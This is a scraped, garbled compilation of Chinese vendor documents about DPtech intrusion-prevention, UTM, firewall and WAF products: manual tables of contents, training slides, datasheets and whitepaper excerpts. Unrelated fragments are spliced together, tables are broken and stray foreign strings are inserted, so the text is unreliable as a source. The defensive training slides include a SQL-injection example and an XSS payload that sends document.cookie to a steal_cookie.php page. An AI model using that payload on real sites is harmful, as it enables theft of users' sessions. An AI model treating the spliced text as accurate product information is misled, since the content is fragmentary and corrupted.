DPtechIPS2000系列入侵防御系统培训胶片
DPtech IPS2000-GA-N入侵防御系统安装手册
iii
DPtech IPS2000-GA-N 入侵防御系统 安装手册
目 录
第 1 章 产品介绍 1.1 产品概述 1.2 DPTECH IPS2000-GA-N 产品外观 1.3 产品规格 1.3.1 存储器 1.3.2 外形尺寸和重量 1.3.3 固定接口 1.3.4 输入电源 1.3.5 工作环境 1.4 产品组件 1.4.1 处理器及存储器 1.4.2 各类接口 1.4.3 PFP 接口 第 2 章 安装前的准备 2.1 通用安全注意事项 2.2 检查安装场所 2.2.2 温度/湿度要求 2.2.3 洁净度要求 2.2.4 防静电要求 2.2.5 抗干扰要求 2.2.6 防雷击要求 2.2.7 接地要求 2.2.8 布线要求 1-1 1-1 1-1 1-3 1-3 1-4 1-4 1-4 1-5 1-5 1-5 1-5 1-6 2-1 2-1 2-1 2-1 2-2 2-2 2-3 2-3 2-3 2-3
DPtech IPS2000-GA-N 入侵防御系统 安装手册
DPtech IPS2000-GA-N 入侵防御系统 安装手册
i
DPtech IPS2000-GA-N 入侵防御系统 安装手册
杭州迪普科技有限公司为客户提供全方位的技术支持。 通过杭州迪普科技有限公司代理商购买产品的用户,请直接与销售 代理商联系;直接向杭州迪普科技有限公司购买产品的用户,可直 接与公司联系。
迪普科技产品培训资料
支持对各类P2P/IM、流媒体、炒股软件、网络游戏等多种应用进行控制 提供阻断、限流、干扰、告警等多种控制方式,可按时间段实施控制策略 对用户或应用进行优先级划分,确保关键用户和关键应用的带宽
P2P Thunder(讯雷)
BitTorent eMule(电骡) eDonkey(电驴) Kugoo(酷狗)
FW1000-GA-N
百兆级
FW1000-MS-N
FW1000-MA-N
•业务创新:下一代应用防火墙,内嵌丰富的应用过滤与控制引擎 •卓越领先:百G平台,先进的硬件架构体系 •硬件加密:全内置硬件IPSec、SSL加密 •组网灵活:支持丰富的网络协议,适应各种复杂组网环境
FW1000-ME-N
Page 4
USER3 SIP:192.168.0.3
NAT前
1. SIP:192.168.01=>SIP:10.153.100.1 2. SIP:192.168.02=>SIP:10.153.100.1 3. SIP:192.168.03=>SIP:10.153.100.1
DPtech 应用防火墙智能NAT
SIP:10.153.Fra Baidu bibliotek00.1
全面的应用防火墙功能
行为审计 攻击防范
流量控制
有线无线 一体化
URL过滤
VPN
IPS入侵防御系统学习
的措施和结果进行记录。
入侵防护系统主要由嗅探器、检测分析组件、策略执行组件、
状态开关、日志系统和控制台组成。
3
二、IDS与IPS简单介绍 入侵检测系统(IDS)对那些异常的、可能是入侵行为的数据 进行检测和报警,告知使用者网络中的实时状况,并提供相应的解 决、处理方法,是一种侧重于风险管理的安全产品。 入侵防御系统(IPS)对那些被明确判断为攻击行为,会对网 络、数据造成危害的恶意行为进行检测和防御,降低或是减免使用 者对异常状况的处理资源开销,是一种侧重于风险控制的安全产品 。
S12500
漏洞扫描系统
L2_Link
L2_Link
基于每个虚拟防火墙ip的策 略路由 基于源ip(服务器地址) 的策略路由 net-hop y.y.y.2
服务器群
20
谢 谢!
Page 21
*准确识别各种网络流量,降低漏报和误报率,避免影响正常的业务通讯;
DPtech UTM2000系列统一威胁管理安装手册v1.1
DPtech UTM2000系列统一威胁管理
安装手册
杭州迪普科技有限公司为客户提供全方位的技术支持。
通过杭州迪普科技有限公司代理商购买产品的用户,请直接与销售代理商联系;直接向杭州迪普科技有限公司购买产品的用户,可直接与公司联系。
杭州迪普科技有限公司
地址:杭州市滨江区通和路68号中财大厦6层
邮编:310052
声明
Copyright2009
杭州迪普科技有限公司
版权所有,保留一切权利。
非经本公司书面许可,任何单位和个人不得擅自摘抄、复制本书内容的部分或全部,并不得以任何形式传播。
由于产品版本升级或其他原因,本手册内容有可能变更。杭州迪普科技有限公司保留在没有任何通知或者提示的情况下对本手册的内容进行修改的权利。本手册仅作为使用指导,杭州迪普科技有限公司尽全力在本手册中提供准确的信息,但是杭州迪普科技有限公司并不确保手册内容完全没有错误,本手册中的所有陈述、信息和建议也不构成任何明示或暗示的担保。
目录
第1章产品介绍1-1
1.1产品概述1-1 1.2产品型号及规格介绍1-1 1.3前后面板介绍1-3 1.3.1UTM2000-MA-N/UTM2000-ME-N/UTM2000-MS-N/UTM2000-CS-N产品外观1-3 1.3.2UTM2000-GS-N/UTM2000-GM-N产品外观1-5 1.3.3UTM2000-CA-N产品外观1-7 1.3.4UTM2000-GA-N产品外观1-9 1.3.5UTM2000-GE-N/UTM2000-TS-N产品外观1-11 1.4端口介绍1-14 1.4.1C ONSOLE口1-14 1.4.210/100/1000B ASE-T以太网电接口1-14 1.4.3SFP口1-16 1.5产品组件1-18 1.5.1处理器及存储器1-18 1.5.2各类接口1-18
DPtech IPS2000-GE-N抗DDOS攻击设备配置文档
ii
DPtech IPS2000-GE-N 抗 DDOS 攻击设备 安装手册
声明
Copyright 2009 杭州迪普科技有限公司 版权所有,保留一切权利。 非经本公司书面许可,任何单位和个人不得擅自摘抄、复制本书内容的 部分或全部,并不得以任何形式传播。
3-3
iv
3.3.3 安装设备到 19 英寸机柜 3.4 连接接地线 3.5 连接接口线缆 3.5.1 连接配置口线缆 3.5.2 连接网络管理口 3.5.3 连接业务口 3.6 连接电源线 3.7 安装后检查
第 4 章 设备启动及软件升级
4.1 设备启动 4.1.1 搭建配置环境 4.1.2 设备上电 4.1.3 启动过程 4.2 WEB默认登录方式
常亮 闪烁
表示 GE 电口处于连接状态 表示 GE 电口有数据收发
常灭
表示 GE 电口处于非连接状态
(7) 1000M 以太网光接口指 示灯(绿色)
常亮 闪烁
表示 GE 光口处于连接状态 表示 GE 光口有数据收发
常灭
表示 GE 光口处于非连接状态
(8) 10000M 以太网光接口指 示灯(绿色)
常亮 闪烁
DPtech UTM2000 统一威胁管理
DPtech UTM2000入侵防御技术白皮书
1、概述
本篇文章主要介绍DPtech UTM2000系列产品中入侵防御功能的相关技术
1.1 相关术语
段(segment):段是一个物理组网下对经过UTM设备数据的一个逻辑划分,通常是一对或者多对接口,或者包含VLAN ID的接口数据流,入侵防御相关的业务都基于segment进行配置。
1.2 网络安全现状
融入全球化的Internet是企业网络发展的必然趋势,每个企业的Intranet都会有许多与外部连接的链路,如通过专线连入Internet,提供远程接入服务供业务伙伴和出差员工访问等,企业网络边界的淡化,企业面临的威胁的机会也增大了,只要一个访问入口防护不完整,则“黑客”将可以入侵企业,获取数据或者破坏。
1.3 基于网络的攻击与检测技术
入侵防御的基本功能是识别尽可能多的攻击,同时又避免不必要的误报,同时也需要保证企业有限的带宽不被滥用,为了达到上述目标,单纯的采用一种技术手段是无法做到的,迪普创新性的融合了多种内容识别技术,保证了系统能够快速高效的发现异常流量并阻断,同时保证正常业务的开展,提供如下几项技术:基于流的状态特征检测技术,基于攻击固定特征的检测这是IDS/入侵防御最基本攻击检测技术,而基于流的状态特征检测技术与以往的不同的是,可以是基于协议上下文的特征检测技术,这样可以很好的避免误报的发生;如某一个特征只在三次会话之后的client方向发生,则检测时只会针对这部分数据流进行检测,而不会引起误报;
·协议异常检测技术,通常也叫协议分析,即对照RFC规范对通讯的协议进行检查,这对于检测基于RFC 未规范一些未知攻击或新的攻击非常有效;同时对于基于固定特征的逃逸也具有先天的免疫;
DPtech IPS培训胶片
实际插入的SQL语句变为: SELECT * FROM user WHERE username = ‘dptech'/*' AND pwd = ''
26
IPS攻击防护-Web安全-SQL注入案例2
某论坛用户修改密码的页面代码如下: $sql = "UPDATE $tblname SET pwd = '$password' WHERE username = '$username'"; $result = mysql_query($sql) ; IE中正常的URL如下:
• 危害
– 存在漏洞的是网站,被攻击的是浏览该网站的用户
30
IPS攻击防护-Web安全-XSS案例
假设某BBS网站可以发贴 1、攻击者在发贴区域发布脚本,其中包含恶意代码, 例如重定向到某个恶意网站 <script>document.localiton=’http://mys ite.com/steal_cookie.php?’%2Bdocument. cookie</script> 2、浏览者正常浏览该页面,正常情况下应该看到发 布的内容,但服务器在传给客户端的HTML页面中包 含了这段代码,导致用户的页面被重定向到恶意网站 3、恶意网站可以收集访问它的用户的个人信息
DPtech IPS2000入侵防御系统
迪普安全产品线主打胶片(PPT41页)
WAF3000 Web应用防火墙
WAF3000-Blade WAF3000-GE
URL库
基于内容分类的URL访问控制,超过1000 万URL地址信息,提供灵活的分类
业界首屈一指的专业特征库团队,特征库一次解析,多次匹配
www.dptechnology.net
20
独创的虚拟现实计算引擎
黑白名单
身份认证
业务流量
协议库
病毒库
未发现威胁
虚拟环境
基于攻击原理模拟现实环境运行请求
未发现威胁 允许通过
VEM虚拟化
教育行
医疗行
业解决
业解决
……
方案
方案
OVC虚拟化
紧耦合与流定义
L2~7虚拟化 全网融合
N:1虚拟化
产品技术体系
纵向虚拟化
1:M虚拟化 安全、应用交付与网络融合
www.dptechnology.net
44
产品技术创新
L2~7融合操作系统ConPlat、高性能硬件架构APP-X、应用识别与威胁特征库APP-ID使得迪普 科技的产品在具有丰富网络特性的同时,天然识别和支持应用,全面满足应用对安全及效率的 需求
DPtech IPS PFP 快速入门v1.2
DPtech IPS PFP 快速入门
声明
Copyright © 2008-2016杭州迪普科技有限公司版权所有,保留一切权利。
非经本公司书面许可,任何单位和个人不得擅自摘抄、复制本书内容的部分或全部,并不得以任何形式传播。
为杭州迪普科技有限公司的商标。
对于本手册中出现的其他所有商标或注册商标,由各自的所有人拥有。
由于产品版本升级或其他原因,本手册内容有可能变更。杭州迪普科技有限公司保留在没有任何通知或者提示的情况下对本手册的内容进行修改的权利。本手册仅作为使用指导,杭州迪普科技有限公司尽全力在本手册中提供准确的信息,但是杭州迪普科技有限公司并不确保手册内容完全没有错误,本手册中的所有陈述、信息和建议也不构成任何明示或暗示的担保。
杭州迪普科技有限公司
地址:杭州市滨江区通和路68号中财大厦6层
邮编:310051
网址:http://
邮箱:support@
7x24小时技术服务热线:400-6100-598
目录
1产品介绍1-1
1.1产品概述1-1
1.2 DPtech PFP工作原理1-2
1.3硬件规格1-4
1.3.1外形尺寸和重量1-4
1.3.2固定接口1-4
1.3.3输入电源1-4
1.3.4工作环境1-5
1.4产品外观1-5 2安装前的准备2-1
2.1通用安全注意事项2-1
2.2检查安装场所2-1
2.2.1安装地点2-1
2.2.2温度/湿度要求2-2
2.2.3洁净度要求2-2
2.2.4防静电要求2-3
2.2.5抗干扰要求2-3
2.2.6防雷击要求2-4
2.2.7布线要求2-4
2.3激光使用安全2-4
(售前)DPtech FW、UTM培训胶片
Trust 可信区域
www.diputech.com 15
灵活智能NAT转换
n支持多个地址对一个地址的转换 n支持多个地址对多个地址的转换 n支持一对一地址转换 n支持基于端口的转换
USER1 SIP:192.168.0.1 USER2 SIP:192.168.0.1 USER3 SIP:192.168.0.1
网络钓鱼
n防病毒 n防垃圾邮件 nURL过滤
Servers
Users
URL Filters
增加单点故 障风险
管理复杂、 投入成本高
www.diputech.com 24 24
UTM是趋势
UTM的产品设计顺应了安全需求趋势,满足对威胁管理多样化的要求,是2007年增长 最快的安全产品。 ――CCID《2007-2008年中国信息安全产品市场研究年度报告》 统一威胁管理硬件市场在2007 年的增长非常迅猛,全年同比增长87.6%,其中下半年 同比增长105.4%,是2007 年下半年增长速度最快的安全子市场。 ――IDC《中国IT安全市场分析与预测,2007》
n状态检测防火墙 n灵活的NAT配置 n多种VPN组合应用
内部网络
只允许内网发 起的各种访问
Internet
办事处
禁止外网发起的 各种访问
ACL 规则
公司总部
外网用户
www.diputech.com 28
DPtech IPS2000-GC-N入侵防御系统安装手册V1.0
iii
DPtech IPS2000-GC-N 入侵防御系统安装手册
目 录
第 1 章 产品介绍 1.1 产品概述 1.2 DPTECH IPS2000-GC-N 产品外观 1.3 产品规格 1.3.1 存储器 1.3.2 外形尺寸和重量 1.3.3 固定接口和槽位数 1.3.4 输入电源 1.3.5 工作环境 1.4 产品组件 1.4.1 处理器及存储器 1.4.2 各类接口 1.4.3 PFP 接口 第 2 章 安装前的准备 2.1 通用安全注意事项 2.2 检查安装场所 2.2.2 温度/湿度要求 2.2.3 洁净度要求 2.2.4 防静电要求 2.2.5 抗干扰要求 2.2.6 防雷击要求 2.2.7 接地要求 2.2.8 布线要求 2.3 安装工具 1-1 1-1 1-1 1-3 1-3 1-3 1-4 1-4 1-4 1-5 1-5 1-5 错误!未定义书签。 2-1 2-1 2-1 2-1 2-2 2-2 2-3 2-3 2-3 2-3 2-3
常亮 闪烁 常灭
第 1 章 产品介绍
DPtech IPS2000-GC-N 入侵防御系统 安装手册 指示灯 (14) 10/100/1000M 以太网电 接口指示灯 闪烁 常灭 表示 GE 管理口 1 有数据收发 表示 GE 管理口 1 处于非连接状态 状态 常亮 说明 表示 GE 管理口 1 处于连接状态
杭州迪普科技有限公司
DPtech IPS2000 N系列产品彩页
DPtech IPS2000 系列入侵防御系统
【产品彩页】 DPtech IPS2000 系列
产品概述
随着网络的飞速发展,以蠕虫、木马、间谍软件、DDoS 攻击、带宽滥用为代表的应用层攻击层出不穷。传统的基于网 络层的防护只能针对报文头进行检查和规则匹配,但目前大量应用层攻击都隐藏在正常报文中,甚至是跨越几个报文, 因此仅仅分析单个报文头意义不大。IPS 正是通过对报文进行深度检测,对应用层威胁进行实时防御的安全产品。但目 前大多数 IPS 都是从原有的 IDS 平台改制而来,性能低、误报和漏报率高、可靠性差,尤其是在新应用不断增多、特征 库不断增长的情况下,性能压力持续增加,只能通过减少或关闭特征库来规避。这样的 IPS 不仅起不到安全防御的作用, 甚至会成为网络中的故障点。
天清NGIPS_产品介绍胶片
恶意代码检测技术
• 在APT攻击的样本传输阶段,有效发现攻击
• 恶意代码行为特征检测 • 静态仿真检测技术(SSE) • 策略匹配检测技术 • 自定义YARA(一个知名的恶意软件识别和分类工具)规则 • 与APT动态检测引擎(基于沙箱模拟环境)产品联动 • 已知恶意木马病毒检测 • 已知漏洞攻击样本检测
产品功能定位—IPS与IDS
• IPS追求精确阻断,IDS追求有有效呈现
– IDS呈现的事件≠ IPS精确阻断的事件 – IDS需要全面有效呈现,IPS需要精确阻断
办公网
内网
IPS精确阻断事件 IDS有效呈现
Internet
产品功能定位—IPS与UTM、NGFW
专业单反相机
2400万像素的Nikon D800E
旁路部署
N
IDS
深层分析
Y
在线部署
Y
FW
低层分析
N
无连接攻击
……
入侵及威胁
深层攻击
深层分析
IPS 在线部署
• 工作原理 :串行部署于网络关键路径,对深层攻击行为进行精确识别和实 时阻断,主动而有效的保护网络安全。
• 关键价值 :具备对已知、未知威胁的精确检测能力,执行实时高效的自动 化威胁防御,简单而有效的保护用户网络及业务免受深层威胁的侵害。
• 在与IDS、UTM的争论中,国内IPS 独立市场形成并高速增长
迪普 DPtech IPS2000技术白皮书
DPtech IPS2000技术白皮书
杭州迪普科技有限公司
2013年8月
目录
一、概述 (3)
二、产品简介 (3)
三、产品特色技术介绍 (4)
1.先进的特征提取技术 (4)
1.1.协议特征形式化建模流程 (4)
1.2.特征数据挖掘算法模型 (5)
2.攻击防御技术 (5)
2.1.基于指纹特征的检测技术 (5)
2.1.1 蠕虫攻击防护 (6)
2.1.2 SQL注入防护 (6)
2.1.3 XSS攻击防护 (7)
2.1.4 缓冲区溢出防护 (7)
2.1.5 系统漏洞攻击防护 (7)
2.1.6 碎片攻击防护 (7)
2.1.7 未知威胁检测防护 (8)
2.2.异常流量检测技术 (8)
3.病毒过滤技术 (8)
4.网络带宽限制技术 (10)
4.1.基于用户的带宽管理 (10)
4.2.基于服务的带宽管理 (10)
5.网络访问控制技术 (10)
6.URL过滤技术 (10)
7.高可靠安全性 (11)
7.1.完善的HA部署方式 (11)
7.2.支持冗余电源 (12)
7.3.丰富的Bypass功能 (12)
一、概述
随着网络的飞速发展,以蠕虫、木马、间谍软件、DDoS攻击、带宽滥用为代表的应用层攻击层出不穷。传统的基于网络层的防护只能针对报文头进行检查和规则匹配,但目前大量应用层攻击都隐藏在正常报文中,甚至是跨越几个报文,因此仅仅分析单个报文头意义不大。IPS正是通过对报文进行深度检测,对应用层威胁进行实时防御的安全产品。但目前大多数IPS都是从原有的IDS平台改制而来,性能低、误报和漏报率高、可靠性差,尤其是在新应用不断增多、特征库不断增长的情况下,性能压力持续增加,只能通过减少或关闭特征库来规避。这样的IPS不仅起不到安全防御的作用,甚至会成为网络中的故障点。
DPtech UTM2000 系列产品彩页
⏹ 最全面的一体化安全设备,提供L2~7全面安全防护
为了更好的应对混合型攻击,DPtech UTM2000采用L2~7融合操作系统ConPlat ,具备防火墙、入侵防御、防毒墙、内容过滤等诸多功能,是目前业界功能最丰富的UTM 产品,能够为用户提供L2~7完全融合的防御效果。 ⏹ 采用先进的多核硬件架构,多种业务并行线速处理
DPtech UTM2000基于迪普科技高性能硬件架构APP-X ,即使多功能开启、特征库增加,也不会影响设备性能和网络时延。 ⏹ 有线无线一体化解决方案,提供多样的接入方式
DPtech UTM2000支持有线无线一体化,通过WiFi 和3G 网络,可以提供全面的无线网络安全防护以及线路备份解决方案,帮助用户实现降低建设成本、简化网络结构、易于管理等需求,是用户综合安全保障的最佳选择。 ⏹ 专业的特征库团队,特征库自动升级,持续安全防护
迪普科技拥有一支专业的特征库团队,实时跟踪网络安全领域的最新动态,提供应用识别与威胁特征库APP-ID ,设备可及时自动升级,能够为用户网络提供实时的防御能力。 ⏹ 丰富的防火墙功能
DPtech UTM2000 支持先进的应用防火墙技术,可以提供灵活的安全区域隔离功能,能够按区域进行重点安全防护,并且支持NAT 、虚拟防火墙、MCE 等功能。 ⏹ 全内置
IPSec VPN 、SSL VPN 硬件加密 面对用户分支互联、移动办公的需求,DPtech UTM2000全内置IPSec VPN 、SSL VPN 硬件加解密功能,在简化网络结构的基础上,极大的提升了用户网络安全建设的性价比。 ⏹ 专业的系统漏洞防护,实现虚拟软件补丁技术
- 1、下载文档前请自行甄别文档内容的完整性,平台不提供额外的编辑、内容补充、找答案等附加服务。
- 2、"仅部分预览"的文档,不可在线预览部分如存在完整性等问题,可反馈申请退款(可完整预览的文档不适用该条件!)。
- 3、如文档侵犯您的权益,请联系客服反馈,我们会尽快为您处理(人工客服工作时间:9:00-18:30)。
边界在哪里?
3
趋势二:新业务模式层出不穷
WEB2.0
云计算
P2P应用
网上支付
4
趋势三:安全漏洞不断爆发
网络设备、操作系统、数据库软件、应用软件漏洞数不胜数
➢微软操作系统视频功能组件高危漏洞 ➢微软Office 组件高危漏洞 ➢微软IE 浏览器0day 漏洞 ➢域名系统软件Bind 9 高危漏洞 ……
22
IPS攻击防护-Web安全-SQL注入
• 原理
– 利用程序中的漏洞,构造特殊的SQL语句并提交以获 取敏感信息
• 危害
– 获取系统控制权 – 未经授权状况下操作数据库的数据 – 恶意篡改网页内容 – 私自添加系统帐号或数据库使用者帐号
Oracle E-mail HTTP P2P Rate Limit Kazaa eDonkey WinMX
蠕虫/病毒
应用层 安全威胁
网络钓鱼
6
趋势五:利益驱动下的信息犯罪
➢越来越多信息安全事件是以经济利益为驱动 ➢病毒、木马、攻击已形成产业链
7
目录
安全趋势 产品介绍 技术特点 组网模式 典型配置 运维管理
交换芯片
CPU
转发
20
超强性能
报文
FPGA 深度流检测引擎 Web防护引擎
DDos引擎
10GE 通道 10GE 通道 交换芯片
CPU 协议分析引擎
其他业务
转发
21
IPS攻击防护
• 漏洞都是由于应用系统的错误导致的,针对不同 的防护对象可以开启不同的防护策略
• IPS具备全面的攻击防护功能
– Web安全 – 缓冲区溢出漏洞 – 操作系统漏洞 – 恶意代码 – 协议异常功能
Zero Day Attack!
5
Mbps (Average per Hour)
趋势四:安全威胁多样化
200 180 160 140 120 100
80 60 40 20
0 13:00 19:00 1:00 7:00 13:00 19:00 1:00 7:00 13:00 19:00 1:00 7:00 13:00 19:00 1:00 7:00 13:00 19:00 1:00 7:00 13:00 19:00 1:00 7:00 13:00 19:00 1:00 7:00 13:00 19:00
8
DPtech IPS2000产品系列
万兆级
IPS2000-TS-N
千兆级
IPS2000-GS-N
IPS2000-GA-N
IPS2000-GE-N
百兆级
IPS2000-MC-N
IPS2000-MS-N
IPS2000-MA-N
IPS2000-ME-N
迪普科技拥有从百兆至万兆的全系列入侵防御系统,可覆盖中小 型企业、大型企业以及运营商的各种应用层安全防护需求。
– 内置FPGA硬件以及硬件逻辑检测引擎
通过FPGA的硬件检测引擎,极大的提高设备性能以及 设备的竞争力
14
DPtech系列产品硬件架构
– 内置高速网络转发和处理芯片
网络接口密度高、数量多、接口类型丰富,能够满足 各种部署和组网需求
– 掉电保护模块
保证在异常断电等各种突发环境下的网络可用性,从 而保证设备的可靠性
(内置3组掉电保护)12个千 置3组掉电保护)6 个千兆自 个插槽,2个 口 )6 个 千 兆 自
兆自适应光口,2个万兆光 适应光口
GE管理口
适应电口
口,1个RJ45串口,1 个USB
口
பைடு நூலகம்13
DPtech系列产品硬件架构
– 多核CPU硬件架构
提高CPU处理能力,多核并发处理网络流量,提高设 备处理性能
DPtech IPS2000入侵防御系统
目录
安全趋势 产品介绍 技术特点 组网模式 典型配置 运维管理
1
安全事件不断爆发
根据国家计算机网络应急技术处理协调中心(简称CNCERT/CC)报告,网 络安全事件依然持续不断爆发。
2009 年CNCERT 共接收21927 件网络安全事件报告
2
趋势一:网络无边界
DPtech IPS2000产品系列
型号
IPS2000-TS-N IPS2000-GE-N IPS 2000-GA-N IPS 2000-GS-N IPS 2000ME-N IPS 2000-MA -N
吞吐量 并发会话数 新建会话数
12Gbps 400W 20W/S
6Gbps 400W 20W/S
9
DPtech IPS2000产品系列
IPS2000-MC/MS/MA-N
IPS2000-ME–N
千兆光口 千兆电口 管理口 串口
10
DPtech IPS2000产品系列
IPS2000-GS/GA-N IPS2000-GE-N
11
DPtech IPS2000产品系列
IPS2000-TS-N
12
3Gbps 100W 4W/S
1.5Gbps 100W 2W/S
800Mbps 100W 2W/S
300Mbps 20W 1W/S
高度
2U
2U
1U
1U
1U
1U
接口
2个管理口(千兆自适应、 2个管理口(千兆自适应、电 2GE 光 口 , 2 个 管 理 口 ( 千
电口)12个千兆自适用电口 口)6个千兆自适应电口(内 6GE电口,一 兆自适应、电
18
超强性能
• 多核CPU+大容量FPGA,实现不同会话的并行处理
• 硬件网络加速单元NA按照不同的报文内容,将不同的会 话分发到不同的CPU进行处理,同时实现CPU间均衡负载 分担
• 深度流检测引擎只进行一次匹配,输出检测结果供后续策 略模块使用
19
超强性能
报文
FPGA
10GE 通道 10GE 通道
16
DPtech系列产品软件架构
– Web应用防护引擎
对HTTP报文进行细致分析,完成协议切分、进行解码处 理、进行负载处理以及进行语法和语义分析,防护多 种Web攻击
– DDos检测引擎
基于报文内容和统计学原理,精确识别各种DDos攻击
17
目录
安全趋势 产品介绍 技术特点 组网模式 典型配置 运维管理
15
DPtech系列产品软件架构
– 网络操作系统平台
自主研发的高性能网络操作系统平台,支撑各种不同 的网络产品,同时保障相同产品的各种款型系列资源 整合
– 深度流检测引擎
算法的性能与特征多少无关,检测引擎只需对报文内 容检测一次,即能满足多种检测需求,如协议特征、 病毒特征、IPS特征、url特征等各种特征挖掘,大大提 高多复杂并发业务的检测性能